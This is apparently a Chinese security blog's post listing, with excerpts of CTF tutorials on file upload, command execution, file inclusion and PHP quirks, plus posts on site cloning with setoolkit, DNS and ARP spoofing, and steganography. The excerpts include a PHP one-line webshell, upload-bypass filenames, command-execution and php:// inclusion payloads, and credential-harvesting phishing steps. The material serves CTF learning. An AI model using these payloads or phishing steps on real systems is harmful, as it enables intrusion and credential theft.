- 博客(13)
- 收藏
- 关注
RSS订阅原创 CTF文件上传
文章目录一句话木马文件类型验证修改文件名修改文件类型user.iniauto_append_file和auto_prepend_file本文以ctf.show网站题目为例,总结ctf中的文件上传姿势一句话木马<?php @eval($_POST['shell']);?>文件类型验证文件上传题多数只能上传图片,即jpg/png格式文件修改文件名Content-Disposition: form-data; name="file"; filename="shell.png"将s
2021-03-22 22:40:23
4112
原创 PNG隐写
文章目录二维码IHDR调整图片高度StegSolveFile FormatData ExtractFrame BrowserEXIFbinwalkforemostPNGdebuggertweakpng以 One PieNG 等题目为例,分析PNG隐写姿势二维码IHDR文件头文件尾调整图片高度修改高度在8神的png隐写中,需要改的高度更高可以直接把0改成9,其实可以无脑增大,显示不影响StegSolveStegSolve使用方法在Blue通道找到隐写File Form
2021-03-18 21:32:20
7680
原创 CTF命令执行
文章目录通配符*号?号常用命令其他姿势本文以ctf.show网站题目为例,总结ctf中的命令执行姿势通配符if(!preg_match("/flag/i", $c)){ eval($c); }*号c=system('cat *.php');c=system('cat f*');?号c=system('cat fla?????');c=system('cat f?????hp');常用命令system()passthru()exec()shell_e
2021-03-02 19:13:53
3184
2
原创 CTF文件包含
文章目录php伪协议data伪协议日志文件session文件竞争死亡绕过base64编码绕过本文以ctf.show网站题目为例,总结ctf中的文件包含漏洞php伪协议?file=php://filter/convert.base64-encode/resource=flag.phpdata伪协议?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=PD9waHAgc3lzdGVtKCdjYXQgZmxh
2021-02-28 21:11:30
3304
原创 CTF中的PHP特性
文章目录正则表达式元字符模式修正符preg_match()数组绕过换行绕过intval()字符绕过科学计数法进制转换小数点绕过strpos()md5强类型比较弱类型比较md5碰撞file_put_contents()in_array()优先级本文以ctf.show网站题目为例,总结ctf中的php特性正则表达式元字符模式修正符preg_match()数组绕过preg_match()只能处理字符串,当传入的subject是数组时会返回falseif(preg_match("/[0-9]/
2021-02-26 22:25:52
5278
1
原创 CTF爆破
文章目录Authorization认证域名爆破md5爆破伪随机数php_mt_seed 爆破本文以ctf.show网站题目为例,总结ctf中的爆破姿势Authorization认证基于这一点进行爆破域名爆破二级域名挖掘或通过BP爆破子域名:*.ctfer.commd5爆破<?php error_reporting(0); $a="asdfghjklqwertyuiopzxcvbnm1234567890";for($i=0;$i<36;$i++){
2021-02-24 20:04:26
1294
原创 CTF信息搜集/泄露
CTF信息搜集/泄露注释未删除js前台拦截绕过响应头robots.txt泄露phps源码泄露www.zip源码泄露.git泄露.svn泄露vim泄露cookie泄露域名信息网页特殊信息观察< a href="">标签默认配置社会工程学探针泄露真实ipjs小游戏数据库泄露目录扫描本文以ctf.show网站题目为例,总结ctf中的信息泄露姿势注释未删除js前台拦截绕过js禁止了右键和F12,手动呼出开发者工具即可响应头burp抓包或者F12查看robots.txt泄露ph
2021-02-24 16:49:14
1765
原创 网站克隆
setoolkit使用setoolkit工具:setoolkit选择1,社会工程学攻击选择2,Web攻击向量选择3,认证信息获取攻击方法若选择1,SET将提供Web模板:google、twitter等这里我们选择2,网站克隆注:QQ、微博等对安全等级要求十分严格的Web站点无法克隆成功输入攻击机IP,填写目标网站进行克隆,并监听此时靶机访问攻击机克隆的网站(攻击机IP),POST数据将提交到攻击机声明本文仅供网络安全爱好者学习探讨,请勿用于违法犯罪。...
2021-02-06 12:35:32
1201
原创 DNS攻击及防御
文章目录什么是钓鱼网站?网站制作步骤1.DNS欺骗2.克隆网站声明什么是钓鱼网站?钓鱼网站是指欺骗用户的虚假网站。“钓鱼网站”的页面与真实网站界面基本一致,欺骗消费者或者窃取访问者提交的账号和密码信息。网络钓鱼攻击者利用欺骗性的电子邮件和伪造的Web站点来进行诈骗活动,受骗者往往会泄露自己的财务数据,如信用卡号、帐户用户名和口令等内容。诈骗者通常会将自己伪装成知名银行、在线零售商和信用卡公司等可信的站点,在所有接触诈骗信息的用户中,有高达5%的人都会对这些骗局做出响应。网站制作步骤1.DNS欺
2021-02-02 23:44:55
1545
原创 合成大西瓜物理外挂
合成大西瓜物理外挂前言游戏机制物理外挂1.调整屏幕长度2.屏幕抖动前言《合成大西瓜》玩法和之前的《2048》非常相似:玩家只需要移动不断下落的水果,使其与相同的水果合成体积更大的新水果,等到堆积的水果越过屏幕上方的红线,游戏便结束。这款看似单纯休闲的游戏,其实有着隐形的魔力,让人娱乐上瘾,熬夜“上头”。游戏链接:http://www.wesane.com/game/654/游戏机制1.当水果触碰到屏幕上方的红线时,游戏结束。显然,假如我们有一个很长很长的屏幕,自然可以容纳下更多的水果。2.水
2021-02-01 13:06:35
1624
原创 ARP攻击与欺骗实战
ARP攻击与欺骗实战ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的网络层,负责将某个IP地址解析成对应的MAC地址。文章目录ARP攻击与欺骗实战ARP攻击原理ARP欺骗原理实施ARP欺骗1.安装Arpspoof工具2.开启路由转发3.查看攻击机IP地址和ARP缓存表4.定位被攻击机5.开始攻击ARP欺骗防御声明ARP攻击原理通过伪造IP地址和MAC地址的对应关系,使得网络无法正常通信。ARP欺骗原理欺骗源把自己伪装成网关(或另一
2021-01-30 19:18:11
1143
原创 操作系统复习
操作系统(Operating System,简称OS)是管理计算机硬件与软件资源的计算机程序。操作系统需要处理如管理与配置内存、决定系统资源供需的优先次序、控制输入设备与输出设备、操作网络与管理文件系统等基本事务。操作系统也提供一个让用户与系统交互的操作界面。
2021-01-30 17:18:30
1830
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人